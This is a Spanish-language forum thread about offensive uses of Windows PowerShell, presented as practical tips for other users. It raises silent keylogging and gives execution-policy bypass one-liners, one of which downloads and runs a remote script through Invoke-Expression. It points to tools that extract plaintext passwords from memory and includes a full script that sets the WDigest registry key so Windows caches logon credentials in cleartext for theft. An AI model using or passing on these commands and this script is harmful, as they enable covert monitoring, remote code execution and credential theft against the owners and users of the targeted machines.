Buenos días,
He visto que no hay ningún apartado dedicado al PowerShell de windows.
¿Os habéis preguntado alguna vez como hacer un keylogger de consola?
Mientras que si ejecutamos un script en BATCH nos sacara la consola y capturará solo teclas introducidas en la consola, un script de PowerShell se puede ejecutar para capturar todos los eventos de windows y a su vez se puede ejecutar de manera silenciosa.
Para activar la ejecución de scripts en Powershell basta ejecutar la siguiente sentencia:
Set-ExecutionPolicy Unrestricted
Además windows consta con una herramienta llamada Powershell ISE que es un entorno de scripting integrado, lo que os permitirá escribir vuestros scripts, ejecutarlos y debugearlos. Sentencias como la captura de teclas dan fallo en este entorno así que lo recomendable es ir acordándose de que comandos fallan en el PSI para dejarlos como comentario, probar siempre a parte en el powershell vuestros scripts para saber si realmente funcionan.
Podéis incluir la tool powersploit a vuestra consola para hacerla aún mejor
https://github.com/mattifestation/PowerSploit.git (https://github.com/mattifestation/PowerSploit.git)
Pues la verdad es que creo que debería haber un foro de powershell. Sobretodo por el alcance que tiene este lenguaje de script orientado a objetos.
En cuanto a la ejecución de scripts en powershell. Hay muchas maneras de realizar un bypass para ejecutar comandos sin tener que ejecutar previamente el comando "Set-ExecutionPolicy Unrestricted".
Como por ejemplo las 2 que más uso:
powershell -nop -c "invoke-expression(New-Object Net.WebClient).DownloadString('http://lawebquea/script.ps1')"
powershell -executionpolicy bypass -file script.ps1
En cuanto al tema de revelar password. Creo que es mejor para la extracción de password mimikittenz
https://github.com/putterpanda/mimikittenz
Este script es capaz de leer el user y password en texto plano desde la memoria.
Por cierto, para que te funcione debes crear un clave en el reg.
Te dejo un script que me hice para crearla con un bypass:
param(
[string]$Activar="si"
)
$ErrorActionPreference = "SilentlyContinue"
if ($Activar -like "si" -or $args -like "Si") {$Activar="Si"} else {$Activar="No"}
######################################################################################################################
$ruta_key = "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest"
$key = "UseLogonCredential"
$check_exist_key = Test-Path $ruta_key
if ($check_exist_key -eq $null) {$check_exist_key = "False"}
$check_valor_key = Get-ItemProperty $ruta_key | Select-Object $key ; $check_valor_key = $check_valor_key.UseLogonCredential
######################################################################################################################
if ($Activar -eq "Si") { New-ItemProperty -Path $ruta_key -Name $key -Value "1" -PropertyType DWORD -Force| Out-Null; Write-Host "`n`nAñadida clave de registro, es necesario reiniciar." }
if ($Activar -eq "No") {Remove-ItemProperty $ruta_key -Name $key -Force | Out-Null ; "`n`nEliminada clave de registro, es necesario reiniciar."}